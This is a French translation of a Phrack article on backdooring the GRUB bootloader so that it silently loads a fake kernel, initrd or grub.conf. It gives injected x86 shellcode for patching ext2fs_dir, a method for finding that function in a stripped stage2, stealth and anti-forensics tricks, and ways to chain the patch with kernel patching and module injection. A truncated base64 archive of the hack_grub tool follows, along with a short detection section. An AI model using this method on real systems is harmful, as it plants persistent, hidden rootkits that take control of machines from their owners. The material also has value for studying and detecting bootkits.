==Phrack Inc.==
Volume 0x0b, Issue 0x3f, Phile #0x0a of 0x14
|=-----------------=[ Hacking Grub for fun and profit ]=-----------------=|
|=-----------------------------------------------------------------------=|
|=---------------=[ CoolQ <qufuping@ercist.iscas.ac.cn> ]=---------------=|
|=--------------=[Traduction de TboWan pour arsouyes.org ]=--------------=|
|=-----------------------------------------------------------------------=|
--[ Sommaire
0.0 - Survol des troyens/backdoor/rootkit
1.0 - Processus de démarrage avec Grub
1.1 Comment fonctionne Grub ?
1.2 stage1
1.3 stage1.5 & stage2
1.4 outils Grub
2.0 - Possibilité de charger un fichier spécifié
3.0 - Techniques de Hack
3.1 Comment charger un fake_file
3.2 Comment localiser ext2fs_dir
3.3 Comment pirater grub
3.4 Comment rendre les choses furtives
4.0 - Utilisation
5.0 - Détection
6.0 - Pour finir
7.0 - Ref
8.0 - hack_grub.tar.gz
9.0 - Notes Du Traducteur
--[ 0.0 - Survol des troyens/backdoor/rootkit
Depuis 1989, quand les premiers outils d'édition de logs sont apparus
(Phrack 0x19, n°6 - Hiding out under Unix), les troyens/backdoor/rootkit
ont grandement évolués. Depuis les premiers outils en mode utilisateur
comme LRK4/5, jusqu'à ceux en mode noyau comme knark/adore/adore-ng,
ensuite, apparu SuckIT, l'injection de modules et de nos jours, même le
patching du kernel en static.
Réfléchissez soigneusement, "Qu'est-ce qui est resté intouché ?" Oui,
le chargeur d'amorçage [NDT : bootloader en anglais].
Donc, dans cet article, je présente une façon de faire que grub
suivent vos ordre, c'est à dire qu'il puisse charger un autre noyau/image
initrd/grub.conf quoi qu'il apparaisse dans le fichier grub.conf.
P.S.: Ce papier est basé sur Linux et le système EXT2/3 sur architecture
x86.
--[ 1.0 - Processus de démarrage avec Grub
----[ 1.1 - Comment fonctionne Grub ?
+------------+
| démarrage |
| chargement |
| MBR |
+-----+------+
|
+----------------------+ NON
| Grub est dans le MBR +------->-------+
+----------+-----------+ |
Oui | stage1 +-------+----------+
Oui +--------+---------+ | saut vers la |
+--<---+ stage1.5 config? | | partition active |
| +--------+---------+ +-------+----------+
| Non | |
+-------+--------+ | | +-----+----------------+
| Chargement des | | stage1-> | Chargement du |
| secteurs | | | | secteur de démarrage |
| spécifiés | V +-----+----------------+
+-------+--------+ | | |
^ | | + - - - < - - - + Cf 1.3
| | | +---------+---------+
stage1.5 +-------->------+--------->----+ Chargement stage2 |
+---------+---------+
|
+---------------<--------+
V
+------------+------------+
| Chargement du grub.conf |
| Affichage du menu |
+------------+------------+
| Interaction de l'utilisateur
+-----------+------------+
| Chargement de l'image |
| du noyau et démmarrage |
+------------------------+
----[ 1.2 - stage1
Le stage1 fait 512 octets, vous pouvez voire son source dans
stage1/stage1.S . Il est installé dans le MBR ou dans le secteur de
démarrage de la partition primaire. Sa tâche est simple - charger un
secteur spécifié (défini dans stage2_sector) vers une adresse spécifiée
(donnée dans stage2_address/stage2_segment). Si stage1.5 est configuré, le
premier secteur de stage1.5 est chargé à l'adresse 0200:000; sinon, le
premier secteur de stage2 est chargé à l'adresse 0800;000.
----[ 1.3 - stage1.5 & stage2
On sait que Grub est un chargeur qui gère les systèmes de fichiers,
i.e. Grub peut comprendre et lire les fichiers à partir de différents
systèmes de fichiers, sans l'aide de l'OS (Système d'Exploitation). Mais
alors comment ? Le secret est dans stage1.5 et stage2. Jetez un coup
d'oeuil dans /boot/grub, vous devriez trouver les fichiers suivants :
stage1, stage2, e2fs_stage1_5, fat_stage1_5, ffs_stage1_5, minix_stage1_5,
reiserfs_stage1_5, ...
Nous avons mentionné stage1 en 1.2, le fichier stage1 sera installé
dans le MBR ou sur le secteur de boot. Donc, même si vous supprimez le
fichier stage1, le démarrage du système n'est pas affecté.
Et que ce passe-t-il si on écrase de zéro les fichiers stage2 et
*_stage1_5 ? Le système peut-il toujours démarrer ? La réponse est "non"
pour la première et "oui" pour la dernière. Vous vous posez des questions
sur la raison de tout ceci ? Alors, continuez votre lecture ...
Regardons comment *_stage1_5 et stage2 sont générés :
-------------------------------- BEGIN -----------------------------------
e2fs_stage1_5:
gcc -o e2fs_stage1_5.exec -nostdlib -Wl,-N -Wl,-Ttext -Wl,2000
e2fs_stage1_5_exec-start.o e2fs_stage1_5_exec-asm.o
e2fs_stage1_5_exec-common.o e2fs_stage1_5_exec-char_io.o
e2fs_stage1_5_exec-disk_io.o e2fs_stage1_5_exec-stage1_5.o
e2fs_stage1_5_exec-fsys_ext2fs.o e2fs_stage1_5_exec-bios.o
objcopy -O binary e2fs_stage1_5.exec e2fs_stage1_5
stage2:
gcc -o pre_stage2.exec -nostdlib -Wl,-N -Wl,-Ttext -Wl,8200
pre_stage2_exec-asm.o pre_stage2_exec-bios.o pre_stage2_exec-boot.o
pre_stage2_exec-builtins.o pre_stage2_exec-common.o
pre_stage2_exec-char_io.o pre_stage2_exec-cmdline.o
pre_stage2_exec-disk_io.o pre_stage2_exec-gunzip.o
pre_stage2_exec-fsys_ext2fs.o pre_stage2_exec-fsys_fat.o
pre_stage2_exec-fsys_ffs.o pre_stage2_exec-fsys_minix.o
pre_stage2_exec-fsys_reiserfs.o pre_stage2_exec-fsys_vstafs.o
pre_stage2_exec-hercules.o pre_stage2_exec-serial.o
pre_stage2_exec-smp-imps.o pre_stage2_exec-stage2.o
pre_stage2_exec-md5.o
objcopy -O binary pre_stage2.exec pre_stage2
cat start pre_stage2 > stage2
--------------------------------- END ------------------------------------
D'après la sortie ci-dessus, l'arrangment devrait être comme suit :
e2fs_stage1_5:
[start.S] [asm.S] [common.c] [char_io.c] [disk_io.c] [stage1_5.c]
[fsys_ext2fs.c] [bios.c]
stage2:
[start.S] [asm.S] [bios.c] [boot.c] [builtins.c] [common.c] [char_io.c]
[cmdline.c] [disk_io.c] [gunzip.c] [fsys_ext2fs.c] [fsys_fat.c]
[fsys_ffs.c] [fsys_minix.c] [fsys_reiserfs.c] [fsys_vstafs.c]
[hercules.c] [serial.c] [smp-imps.c] [stage2.c] [md5.c]
On peut voir que e2fs_stage1_5 et stage2 sont similaires. Mais
e2fs_stage1_5 est plus petit, il contient les modules de base (E/S
disques, gestion des chaines, initialisation système, gestion des systèmes
de fichiers ext2/3), tandis que stage2 est tout en un, il contient tout
les modules de systèmes de fichiers, affichage, chiffrement, etc.
start.S est très important pour Grub. stage1 va charger start.S vers
0200:0000 (si stage1_5 est configuré) ou 0800:0000 (sinon), et ensuite
sauter vers cet endroit. La tâche de start.S est très simple (seulement
512 octets), il va charger le reste de stage1_5 ou stage2 vers la mémoire.
La question est, puisque le code relatif au système de fichier n'a pas été
chargé, comment grub peut-il connaître l'endroit où se trouve le reste des
secteurs ? start.S fait le truc :
-------------------------------- BEGIN -----------------------------------
blocklist_default_start:
.long 2 /* C'est le secteur de début, en nombre de
secteurs logiques depuis le début du disque,
secteur 0 */
blocklist_default_len: /* C'est le nombre de secteurs à lire */
#ifdef STAGE1_5
.word 0 /* La commande "install" va remplir ceci */
#else
.word (STAGE2_SIZE + 511) >> 9
#endif
blocklist_default_seg:
#ifdef STAGE1_5
.word 0x220
#else
.word 0x820 /* C'est le segment de l'adresse de début
vers où charger les données */
#endif
firstlist: /* Ce point de repère doit être après
la liste des données !!! */
--------------------------------- END ------------------------------------
Un exemple :
# hexdump -x -n 512 /boot/grub/stage2
...
00001d0 [ 0000 0000 0000 0000 ][ 0000 0000 0000 0000 ]
00001e0 [ 62c7 0026 0064 1600 ][ 62af 0026 0010 1400 ]
00001f0 [ 6287 0026 0020 1000 ][ 61d0 0026 003f 0820 ]
On devrait interpreter ceci (en sens inverse) comme : charger 0x3f
secteurs (commençants au n° 0x2664d0) vers 0x0820:0000, charger 0x20
secteurs (commençants au n° 0x266287) vers 0x1000:0000, charger 0x10
secteurs (commençants au n° 0x2662c7) vers 0x1600:000.
Dans ma distrib, stage2 a 0xd4 (1+0x3f+0x20+0x10+0x64) secteurs, la
taille du fichier est de 108328 octets, les deux correspondent bien (un
secteur fait 512).
Quand start.S fini de s'exécuter, stage1_5/stage2 est complètement
chargé. start.S saute vers asm.S et continue de s'exécuter.
Il reste toujours un problème, quand est-ce que stage1.5 est configuré
? En fait, stage1.5 n'est pas nécessaire. Sa tâche est de charger
/boo/grub/stage2 en mémoire. Mais faites attention, stage1.5 utilise le
système de fichier pour charger stage2 : il analyse la dentry, récupère
l'inode de stage2, ensuite, sa liste des blocks. Donc, si stage1.5 est
configuré, stage2 est chargé d'après le système de fichier; sinon, stage2
est chragé à la fois à partir de stage2_sector dans stage1 et la liste de
secteurs dans pour stage2 start.S pour stage2.
Pour que les choses soient clairs, supposez le scénario suivant :
(ext2/ext3)
# mv /boot/grub/stage2 /boot/grub/stage2.bak
Si stage1.5 est configuré, le démarrage rate, stage1.5 ne peut trouver
/boot/grub/stage2 dans le système de ficher. Mais si stage1.5 n'est pas
configuré, le démarrage réussi ! C'est parce que mv ne change pas
l'agencement mémoire de stage2, donc, stage2_sector reste le même, et
pareil pour la liste de secteurs de stage2.
Maintenant, stage1 (-> stage1.5) -> stage2. Tout est en place. asm.S
va entrer en mode protégé, ouvrir /boot/grub/grub.conf (ou menu.lst),
récupérer la configuration, afficher le menu et attendre pour une
interraction de l'utilisateur. Après que l'utilisateur ai choisi le noyau,
grub charge l'image du noyau spécifié (parfois l'image ramdisk aussi), et
démarre le noyau.
----[ 1.4 - outils Grub
Si votre grub est écrasé par windows, vous pouvez utiliser les outils
grub pour le ré-installer.
# grub
---
grub > find /grub/stage2 <- Si vous avez une partition /boot
or
grub > find /boot/grub/stage2 <- Si vous n'avez pas de partition /boot
---
(hd0,0) <= Le résultat de "find"
grub > root (hd0,0) <- la racine de la partition de boot
---
grub > setup (hd0) <- Si vous voulez installer grub en MBR
or
grub > setup (hd0,0) <- Si vous voulez installer grub
--- sur le secteur de boot
Checking if "/boot/grub/stage1" exists... yes
Checking if "/boot/grub/stage2" exists... yes
Checking if "/boot/grub/e2fs_stage1_t" exists... yes
Running "embed /boot/grub/e2fs_stage1_5 (hd0)"... 22 sectors are
embedded succeeded. <= Si vous installez grub sur le
secteur de boot, ça rate
Running "install /boot/grub/stage1 d (hd0) (hd0)1+22 p
(hd0,0)/boot/grub/stage2 /boot/grub/grub.conf"... succeeded
Done
On peut voir que les outils grub essayent d'implanter stage1.5 si
c'est possible. Si grub est installé dans le MBR, stage1.5 est localisé
après le MBR, et fait 22 secteur en taille. Si grub est installé sur le
secteur de boot, il n'y a pas assez de place pour implanter stage1.5 (le
superblock à un offset de 0x400 pour les partitions ext2/ext3, seulement
0x200 pour stage1.5), et donc, la commande "embed" rate.
Référez-vous au manuel de grub et au code source pour plus
d'informations.
--[ 2.0 - Possibilité de charger un fichier spécifié
Grub a son propre mini-système de fichiers pour ext2/3. Il utilise
grub_open(), grub_read() et grub_close() pour ouvrir/lire/fermer un
fichier. Maitnenant, jettons un coup d'oeuil à ext2fs_dir.
/* preconditions: ext2fs_mount already executed, therefore supblk in buffer
* known as SUPERBLOCK
* returns: 0 if error, nonzero iff we were able to find the file
* successfully
* postconditions: on a nonzero return, buffer known as INODE contains the
* inode of the file we were trying to look up
* side effects: messes up GROUP_DESC buffer area
*/
int ext2fs_dir (char *dirname) {
int current_ino = EXT2_ROOT_INO; /*start at the root */
int updir_ino = current_ino; /* the parent of the current directory */
...
}
Admettons que la ligne dans grub.conf soit :
kernel=/boot/vmlinuz-2.6.11 ro root=/dev/hda1
grub_open appelle ext2fr_dir("/boot/vmlinuz-2.6.11 ro
root=/dev/hda1"), ext2fs_dir mes les informations de l'inode dans INODE,
alors, grub_read peut utiliser INODE pour récupérer les données de
n'importe quel offset (la correspondance est dans INODE->i_blocks[] pour
les blocks directs).
Le fonctionnement de ext2fr_dir est le suivant :
1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
^ inode = EXT2_ROOT_INO, Mettre les infos d'inode dans INODE;
2. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
^ trouver dentry dans "/", alors, mettre les infos d'inode de
"/boot" dans INODE;
3. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
^ trouver la dentry dans "/boot", Alors, mettre l'info
d'inode de "/boot/vmlinuz-2.6.11" dans INODE;
4. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
^ Le pointeur voit un espace, INODE est un
fichier régulier, retourner 1 (succès), INODE
ocntient les informations à propos de
"/boot/vmlinuz-2.6.11".
Si nous parasitons ce code, et retournons les infos d'inode de
fake_file, grub va joyeusement charger fake_file, le considérant comme
/boot/vmlinuz-2.6.11.
On peut faire ceci :
1. /boot/vmlinuz-2.6.11 ro root=/dev/hda1
^ inode = EXT2_ROOT_INO;
2. boot/vmlinuz-2.6.11 ro root=/dev/hda1
^ Le changer en 0x0, changer EXT2_ROOT_INO en l'inode de fake_file;
3. boot/vmlinuz-2.6.11 ro root=/dev/hda1
^ les infos de EXT2_ROOT_INO(fake_file) sont dans INODE, le
pointeur est sur "0x0", INODE est un fichier régulier,
retourner 1.
Puisque nous changeont l'argument de ext2fs_dir, est-ce que ça a des
effets de bords ? N'oublions pas la dernière partie "ro root=/dev/hda1",
ce sont les paramètres passés au noyau. Sans eux, le noyau ne démarrera
pas correctement.
(P.S.: faites juste "cat /proc/cmdline" pour voir les paramètres de votre
noyau.)
Bon, jetons un coup d'oeuil à la partie "kernel=..."
kernel_func construit la ligne "kernel=..."
static int
kernel_func (char *arg, int flags)
{
...
/* Copy the command-line to MB_CMDLINE. */
grub_memmove (mb_cmdline, arg, len + 1);
kernel_type = load_image (arg, mb_cmdline, suggested_type, load_flags);
...
}
Vous voyez ? Le arg et mb_cmdline ont deux copies de la chaine
"/boot/vmlinuz-2.6.11 ro root=/dev/hda1" (Il n'y a pas de chevauchement,
en fait, grub_memmove est le même que grub_memcpy). Dans load_image, vous
trouvez que arg et mb_cmdline ne se mélangent pas. Donc, la conclusion est
"aucun effet de bords". Si vous n'y croyez pas, vous pouvez ajouter du
code pour retrouver ces conclusions.
--[ 3.0 - Techniques de Hack
Les techniques de hack devraient être générales pour toutes les
versions de grub (sauf grub-ng) fournie avec toutes les distributions
linux.
----[ 3.1 - Comment charger un fake_file
On peut faire un jump au début de ext2fs_dir, ensuite, mettre le
premier caractère de l'argument de ext2fs_dir à 0, mettre "current_ino =
EXT2_ROOT_INO" à "current_ino = INODE_OF_FAKE_FILE", et revenir au saut.
Attention : On ne peut charger fake_file que dans certaines
conditions. e.g. : quand le système veut ouvrir /boot/vmlinuz-2.6.11,
alors, on retourne /boot/file_fake; mais quand le système veut ouvrir
/boot/grub/grub.conf, on doit retourner le bon fichier. Si le code
continue de retourner fake_file, oups, aucun menu ne sera affiché.
Le saut est facile, mais comment faire pour que "current_ino =
INODE_OF_FAKE_FILE" ?
int ext2fs_dir (char *dirname) {
int current_ino = EXT2_ROOT_INO; /*start at the root */
int updir_ino = current_ino; /* the parent of the current directory */
...
EXT2_ROOT_INO est 2, donc, current_ino et updir_ino sont initialisés à
2. Le code assembleur correspondant doit être du genre de "movl $2,
0xffffXXXX($esp)". Mais gardez en tête l'optimisation : les deux sont
assignés à 2, le résultat optimisé peut alors être "movl $2,
0xffffXXXX($esp)" et "movl $2, 0xffffYYYY($esp)", ou "movl $2, %reg" et
ensuite "movl %reg, 0xffffXXXX($esp)" "movl %reg, 0xffffYYYY($esp)", ou
d'autres variantes. Le type est int, la valeur, 2, alors, les possibilités
de "xor %eax, %eax; inc %eax; inc %eax" est faible, c'est aussi la même
chose pour "xor %eax, %eax; movb $0x2, %al". Ce qu'on a besoin, c'est de
chercher 0x00000002 à de ext2fs_dir à ext2fs_dir + longueur (par exemple
100 octets), et alors, changer le 0x00000002 en INODE_OF_FAKE_FILE.
static char ext2_embed_code[] = {
0x60, /* pusha */
0x9c, /* pushf */
0xeb, 0x28, /* jmp 4f */
0x5f, /* 1: pop %edi */
0x8b, 0xf, /* movl (%edi), %ecx */
0x8b, 0x74, 0x24, 0x28, /* movl 40(%esp), %esi */
0x83, 0xc7, 0x4, /* addl $4, %edi */
0xf3, 0xa6, /* repz cmpsb %es:(%edi), %ds:(%esi) */
0x83, 0xf9, 0x0, /* cmp $0, %ecx */
0x74, 0x2, /* je 2f */
0xeb, 0xe, /* jmp 3f */
0x8b, 0x74, 0x24, 0x28, /* 2: movl 40(%esp), %esi */
0xc6, 0x6, 0x00, /* movb $0x0, (%esi) '\0' */
0x9d, /* popf */
0x61, /* popa */
0xe9, 0x0, 0x0, 0x0, 0x0, /* jmp change_inode */
0x9d, /* 3: popf */
0x61, /* popa */
0xe9, 0x0, 0x0, 0x0, 0x0, /* jmp not_change_inode */
0xe8, 0xd3, 0xff, 0xff, 0xff, /* 4: call 1b */
0x0, 0x0, 0x0, 0x0, /* Longueur du nom du fichier noyau */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, /* chaine du nom de fichier */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, /* 48B en tout */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0
};
memcpy( buf_embed, ext2_embed_code, sizeof(ext2_embed_code));
Bien sûr, vous pouvez écrire votre propre algorithme de comparaison de
chaines.
/* embeded code, 2eme partie, change_inode */
memcpy( buf_embed + sizeof(ext2_embed_code), s_start, s_mov_end - s_start);
modify_EXT2_ROOT_INO_to_INODE_OF_FAKE_FILE();
/* embeded code, 3eme partie, not_change_inode*/
memcpy( buf_embed + sizeof(ext2_embed_code) + (s_mov_end - s_start) + 5,
s_start, s_mov_end - s_start);
Le résultat ressemble à ceci :
ext2fs_dir: not_change_inode:
+------------------------+ +--------> +------------------------+
| push %esp <= jmp embed | | | push %esp |
| mov %esp, %ebp | | | mov %esp, %ebp |
| push %edi | | | push %edi |
| push %esi +--------< | push %esi |
| sub $0x42c, %esp | | | sub $0x42c, %esp |
| mov $2, fffffbe4(%esp) | | | mov $2, fffffbe4(%esp) |
| mov $2, fffffbe0(%esp) | | | mov $2, fffffbe0(%esp) |
|back: | | | jmp back |
+------------------------+ | +------------------------+
embed: +--------> change_inode:
+------------------------+ +------------------------+
| save registers | | push %esp |
| compare strings | | mov %esp, %ebp |
| if match, goto 1 | | push %edi |
| if not, goto 2 | | push %esi |
| 1: restore registers | | sub $0x42c, %esp |
| jmp change_inode | INODE_OF_ -> | mov $?, fffffbe4(%esp) |
| 2: restore registers | FAKE_FILE -> | mov $?, fffffbe0(%esp) |
| jmp not_change_inode | | jmp back |
+------------------------+ +------------------------+
----[ 3.2 - Comment localiser ext2fs_dir
C'est la partie difficile. stage2 est généré par objcopy, alors, tout
informations ELF sont retirées - AUCUNE TABLE DES SYMBOLES! Nous devons
trouver certains PATRONS pour trouver ext2fs_dir.
Le premier choix est log2 :
#define long2(n) ffz(~(n))
static __inline__ unsigned long
ffz (unsigned long word)
{
__asm__ ("bsfl %1, %0"
:"=r" (word)
:"r" (~word));
return word;
}
group_desc = group_id >> log2 (EXT2_DESC_PER_BLOCK (SUPERBLOCK));
La question est, ffz est déclaré comme __inline__, ce qui indique que
PEUT-ÊTRE que cette fonction est inlinée[NDT1], PEUT-ÊTRE que non. Donc,
nous abandonnons cette solution.
Le choix suivant est SUPERBLOCK->s_inodes_per_group dans
group_id = (current_ino - 1) / (SUPERBLOCK->s_inodes_per_group);
#define RAW_ADDR(x) (x)
#define FSYS_BUF RAW_ADDR(0x68000)
#define SUPERBLOCK ((struct ext2_super_block *)(FSYS_BUF))
struct ext2_super_block{
...
__u32 s_inodes_per_group /* # Inodes per group */
...
}
Alors, nous calculons que SUPERBLOCK->s_inodes_per_group est à
l'adresse 0x68028. Cette adresse n'apparait que dans ext2fs_dir, donc, la
possibilité de collision est faible. Après s'être localisé à 0x68028, on
revient en arrière pour trouver le début de ext2fs_dir. Ici arrive une
autre question, "comment identifier le début de ext2fs_dir ?" Bien sur,
vous pouvez rechercher après 0xc3, c'est surement son ret. Mais que ce
passera-t-il si c'est seulement une partie d'une instruction comme une
operande ? Parfois, gcc ajoute aussi du code mort pour que les adresses de
fonctions soient alignées (4 octets/8 octets/16 octets), et dans ce cas,
comment éviter ce code mort ? Listons simplement toutes les combinaisons
possibles ?
Cette solution est praticable mais pas idéale.
Maintenant, on remarque la fsys_table :
struct fsys_entry fsys_table[NUM_FSYS + 1] =
{
...
# ifdef FSYS_FAT
{"fat", fat_mount, fat_read, fat_dir, 0, 0},
# endif
# ifdef FSYS_EXT2FS
{"ext2fs", ext2fs_mount, ext2fs_read, ext2fs_dir, 0, 0},
# endif
# ifdef FSYS_MINIX
{"minix", minix_mount, minix_read, minix_dir, 0, 0},
# endif
...
};
fsys_table est appellée de cette manière :
if ((*(fsys_table[fsys_type].mount_func)) () != 1)
Donc, notre truc, c'est de :
1. Chercher dans stage2 après la chaine ext2fs, et récupérer son offset,
ensuite, convertir ça en adresse mémoire addr_1 (stage2 commence à
partir de 0800:0000).
2. Chercher dans stage2 après addr_1, récupérer son offset, et ensuite,
récupérer les 5 entiers (A, B, C, D, E), A<B ? B<C ? C<addr_1 ? D==0 ?
E==0? Si un seul d'eutre eux est "No", revenir en 1 et continuer à
chercher.
3. Alors, C est l'adresse mémoire de ext2fs_dir,, convertissez-là en
offset dans le fichier. Ok, on y est.
----[ 3.3 - Comment pirater grub
Ok, avec l'aide de 3.1 et 3.2, on peut hacker grub très facilement. La
première cible est stage2. Nous récupérons l'adresse de départ de
ext2fs_dir, ajoutons un JMP vers quelque part, y copions le code quelque
part. Mais où est ce "quelque part" ? Manifestement, la fin de stage2
n'est pas parfaite, ça va changer la taille du fichier. On peut choisir
minix_dir comme cible. Pourquoi pas fat_mount? C'est juste derrière
ext2fs_dir. Mais la réponse est NON! regardez un peut à "root=..."
root_func()->open_device()->attemp_mount()
for (fsys_type = 0; fsys_type < NUM_FSYS
&& (*(fsys_table[fsys_type].mount_func)) () != 1; fsys_type++);
Regardez dans fsys_table fat est avant ext2, donc, fat_mount est
appellé d'abord. Si fat_mount est modifié, Dieu seul connaitra le
résultat. Pour rendre les choses plus sûres, nous choisissons minix_dir.
Maintenant, votre stage2 peut charger votre file_fake. La taille reste
la même mais la valeur de hashage a changé.
----[ 3.4 - Comment rendre les choses furtives
Pourquoi doit-on utiliser /boot/grub/stage2 ? Nous pourrions faire que
stage1 saute vers stage2_fake (cp stage2 stage2_fake, modify stage2_fake),
pour que stage2 reste intacte.
Si vous copiez stage2 vers stage2_fake, stage2_fake ne fonctionnera
pas. Souvenez-vous de la liste des secteurs dans start.S. Vous devez
changer la liste pour correspondre à file_fake, pas vers l'original
stage2. Vous pouvez retrouver l'inode, récupérer i_block[], et ensuite,
vous avez la liste des blocks (N'oubliez pas d'ajouter l'offset dans la
partition). Vous devrez cours-circuiter VFS pour avoir les infos d'inode,
voir [1].
Puisque vous utilisez stage2_fake, l'adresse correspondante dans
stage1 devrait être modifiée. Si stage1.5 n'est pas installé, c'est
facile, vous devez juste changer stage2_sector de stage2_orig vers
stage2_fake (MBR est modifié). Si stage1.5 est installé et que vous êtes
paresseux et intrepide, vous pouvez passer stage1.5 - modifiez
stage2_address, stage2_sector, stage2_segment de stage1. C'est risqué,
parce que 1) si la "détection de virus" est activée dans le BIOS, la
modificication de MBR va-être détectée 2) le "Grub stage1.5" et "Grub
loading, please wait" changeront en "stage2". C'est rapide, pouvez-vous le
voir sur votre PC PUISSANT ?
Si vous voulez vraiment être sfurtis, alors, vous pouvez pirater
stage1.5, avec des techniques similaires aux 3.1 et 3.2. n'oubliez pas de
changer la liste des secteurs de stage1.5 (start.S) - vous devrez
incruster votre code à la fin.
Vous pouvez rendre les choses encore plus furtives : rendre
stage2_fake/kernel_fake caché du système de fichier, e.g. retirer son
entrée de /boot/grub. Et à propos de l'anti-forensick? changez
l'inode_of_stage2 vers inode_from_1_to_10. voir [2]
--[ 4.0 - Utilisation
Combinée avec d'autres techniques, regardez comment notre hack_grub
peut être puissant.
Notes : Tous les fichiers doivent être dans la même partition!
1) Combiné à des patchs static du noyau
a) cp kernel.orig kernel.fake
b) patchez statiquement le kernel.fake[3]
c) cp stage2 stage2.fake
d) hack_grub stage2.fake kernel.orig inode_of_kernel.fake
e) cachez kernel.fake et stage2.fake (optionnel)
2) Combiné avec de l'injection de modules
a) cp initrd.img.orig initrd.img.fake
b) faite votre injection de module avec initrd.img.fake,
e.g. ext3.[k]o [4]
c) cp stage2 stage2.fake
d) hack_grub stage2.fake initrd.img inode_of_initrd.img.fake
e) cachez initrd.img.fake et stage2.fake (optionnel)
3) Faire un faux grub.conf
4) et d'autres...
--[ 5.0 - Détection
1) Gardez un oeuil au MBR et aux 63 secteurs qui suivent, et aussi aux
secteur de boot primaires.
2) Si non 1
a) si stage1.5 est configuré, comparez les secteurs de 3 (adresse
absolue, MBR est le secteur n°1) avec /boot/grub/e2fs_stage1_5
b) si stage1.5 n'est pas configuré, regardez si stage2_sector
pointe vers le réel fichier /boot/grub/stage2
3) Vérifiez la cohérence des fichiers e2fs_stage1_5 et stage2
4) Si non 3 (Hé, êtes-vous vraiment un sysadmin qualifié ?)
if a) Si vous avez un doute à propos du noyau sur le disque, dumpez
le noyau et faite une comparaison octet-à-octet avec celui
sur le disque. voir [5] pour plus d'info.
b) Si vous avez des doutes avec les modules, c'est un problème
difficile, peut-être pouvez-vous les dumper et les
désassembler ?
--[ 6.0 - Pour finir
Lilo est un autre chargeur de démarrage, mais ne gère pas le système
de fichier. Donc Lilo n'est pas de système de fichier construit à
l'intérieur. Il se base sur /boot/bootsect.b et /boot/map.b. Donc, si vous
êtes paresseux, faites un faux lilo.conf, qui affiche a.img mais charge
b.img. Ou alors, vous pouvez faire que lilo charge /boot/map.b.fake. Les
détails dépendent de vous-même.
Merci à madsys & grip2 pour leur aide pour résoudre certaines choses
difficiles à cracker; merci à airsupply et autres types pour des exemples
de stage2 (redhat 7.2/9/as3, Fedora Core 2, gentoo, debian et ubuntu),
merci ) zhtq pour ses commentaires à propos de l'écriture d'article.
--[ 7.0 - Ref
[1] Conception et implémentation du Second Extended Filesystem
http://e2fsprogs.sourceforge.net/ext2intro.html
[2] Méthodes pour cacher des fichier sous ext2/3 (Chinois)
http://www.linuxforum.net/forum/gshowflat.php?Cat=&Board=security&
Number=545342&page=0&view=collapsed&sb=5&o=all&vc=1
[3] Static Kernel Patching
http://www.phrack.org/show.php?p=60&a=8
[4] Infecting Loadable Kernel Modules
http://www.phrack.org/show.php?p=61&a=10
[5] Façons de détecter des rootkits pour noyau 2.6 (Chinois)
http://www.linuxforum.net/forum/gshowflat.php?Cat=&Board=security&
Number=540646&page=0&view=collapsed&sb=5&o=all&vc=1
--[ 8 - hack_grub.tar.gz
begin-base64 644 hack_grub.tar.gz
H4sIADW+x0IAA+19a49kSXZQ7i6wZK1tbEAyHxCKqZnuyczKqsrMenRN5XTv
VldXz9ZOd1W7q3p27J7m7q3Mm1V3Ol99b2Z318w2QgjxwQghIRkLI9viAxL8
AAsjf0D4i5EQ4iGwxCf8AYOQEDIICRAW5jzieR+ZWdWvWW1edXTlvffEiRMn
Tpw4EXHi3DO/9dg7jcYnq4XXdtVq67VrGxvwl67kX/pdrzU269fWrtXWrxVq
9fpGfb0gNl4fSeYaxyM/EqIQDQajSXDT3v+IXme6/YPno5XWaymjVq/VNtfX
c9p/7dp6fdNq/02Ab6xvXiuI2muhJnH9mLf/u2G/1R23A/FhPGqHg5WzGwvO
o254knh2Hq+OzodBjI/N80UUn7NF68F4FHZjfLQAHB6FLRGPonFrJIZ+NPLC
fmcgihX92+uG8UhcFwcP7txpJjIA5gYADdpBEf73TsYdDTHux+FpP2iLsD8q
FhGH1xqM+4ip1lxY8IDYlt/tbpTgfVUIr9uNg+Bx1clXFZ229aQ76J9WxVlY
FQvFxMPuAFOn441EpSqiIE4ienZWhlLhp4j8Z14U+G0smPDLfPB/HABk6wyE
rgJVcVGIOPwiKC98aRWNNetXRdhcKFIlo2AEPxkd3sXjrqxucaHYh1+IAoHl
w7BTktUuIR1MgLhxQ6w19N1VUXvekRc0QFVcZbxVcbS397F3tHdcXigWi9ev
i9JyvYy/gYpx1BfLdSr22VnYDUp9cUPUyl/yWyid6o9lQjXFkgCO9oE9RaSI
AK5DdsIrkYX0UixhTqwj1GZZ/X6xYEG9MDx+FoWj4E0y+SvGY67/a2JyqsNW
ToORh7fUZU/O28HTEiRgOfwftgKvPyC+Eg9DIrsziErMJhGKD4XponC/tFRm
Sl018DB8tKLxYQ0s5KYiV1OZmpp81iJSTKD/D1qzUJ2hn0a9IWAlOYKSK5ir
7/cCJSZFZHyEooaVdZXRaTQYD71+1NSISY/F42EQeSdA0mNRoZsEAOdrB3Gr
WKnwDdaPmGm4t7RED4A+7mhYxwQbqxazRYVEdtApJStZLrP8vgOokL2ng9FA
BFGEkp7SzswOxQV4gPKgbkuGmxKleuPiRaFoQ97BMOiXFEhVHHr3b33/vsyK
AEpyVU7uBsQyyN3jKru1SnJYV46eJZEViwtKUyltje1Z4m5fPnpwb+++d3j7
NnRNeMrKpEyYcGwoFmcrG0v4UEyDtUhrUD0hJwEs34i9nn8KY90718Xep8cN
j+m6u/PR/i4pgs4wAoFD3G3IXRWLD995JEZnYSzgX38AHYDyra5Ro4ejcNBf
+ay/SFrCLhO6ixZaVHGqdKIwlnK0mnqOlaBsTZVdCkuLW0ijTIpgQtqBt1VR
Vw1mMKVZk1ApuqORQkGOmMygFSbKiimemispDguyiyuRKN3aO9qVIsHNUwad
i1BFIGVKBcvlKkIqQXKIrObIk5UbIWzNnilTdmlEluLcGqv3ZJ9+aKmIZVF/
